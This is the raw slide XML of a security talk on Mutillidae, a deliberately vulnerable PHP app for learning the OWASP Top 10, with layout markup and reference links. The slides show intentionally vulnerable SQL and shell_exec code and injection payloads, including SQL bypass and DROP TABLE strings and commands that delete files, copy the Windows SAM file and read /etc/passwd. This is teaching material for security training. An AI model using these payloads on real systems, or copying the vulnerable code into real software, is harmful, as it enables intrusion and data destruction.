      <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="547688" indent="-411163" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="F9F9F9"/>
        </a:buClr>
        <a:buSzPct val="65000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="868363" indent="-282575" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx1"/>
        </a:buClr>
        <a:buSzPct val="80000"/>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1133475" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx1"/>
        </a:buClr>
        <a:buSzPct val="95000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1352550" indent="-182563" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx1"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Wingdings 3" pitchFamily="18" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1544638" indent="-182563" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx1"/>
        </a:buClr>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr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ferruh.mavituna.com/sql-injection-cheatsheet-oku/"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blog.commandlinekungfu.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://unixwiz.net/techtips/sql-injection.html"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ha.ckers.org/xss.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www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://addons.mozilla.org/en-US/firefox/addon/7598" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bindshell.net/tools/beef"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addons.mozilla.org/en-US/firefox/addon/4510"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addons.mozilla.org/en-US/firefox/addon/966"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hyperlink" Target="http://www.owasp.org/index.php/OWASP_Top_Ten_Projec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amurai.inguardians.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10"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it.slashdot.org/article.pl?sid=08/09/30/0136219"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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/"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irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security"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amurai.inguardians.com/"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hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.remote-exploit.org/backtrack.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project"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issa-kentuckiana.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.outerz0ne.org/"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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://notacon.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phreaknic.info/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.louisvilleinfosec.com/"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backtrack-linux.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irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-1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apachefriends.org/en/xampp.html"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www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API"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err="1" smtClean="0"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: A Deliberately Vulnerable Set Of PHP Scripts That Implement The </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adrian Crenshaw</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="C:\Documents and Settings\adrian\Desktop\xampplite\htdocs\images\coykillericonfaceup.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3795710">
            <a:off x="863414" y="4048927"/>
            <a:ext cx="1828800" cy="2377440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="1270000" dir="14280000" sx="140000" sy="140000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="tx1"/>
            </a:outerShdw>
          </a:effec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Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>The Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“SELECT * FROM accounts WHERE username='". $username ."' AND password='".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stripslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($password).”’”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  " . $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>targethost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);'“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Expected to fill in the string to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM accounts WHERE username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adrian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>' AND password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>somepassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irongeek.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>But what if the person injected:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM accounts WHERE username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adrian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>' AND password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>somepassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ or 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irongeek.com &amp;&amp; del *.*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="160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Time!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Simple SQL Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>' or 1=1 -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Wish I could do this, but can't stack in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>/PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>'; DROP TABLE owasp10; -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Command Injections (for Windows):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp; dir</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>wmic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> process list</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>wmic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>useraccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> list</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp; copy c:\WINDOWS\repair\sam &amp;&amp; copy c:\WINDOWS\repair\system.bak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Command Injections (for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>*nix):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>;cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> –A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>target.hak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection Cheat Sheet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection Attacks by Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://unixwiz.net/techtips/sql-injection.html</a:t>
            </a:r>
            <a:r>
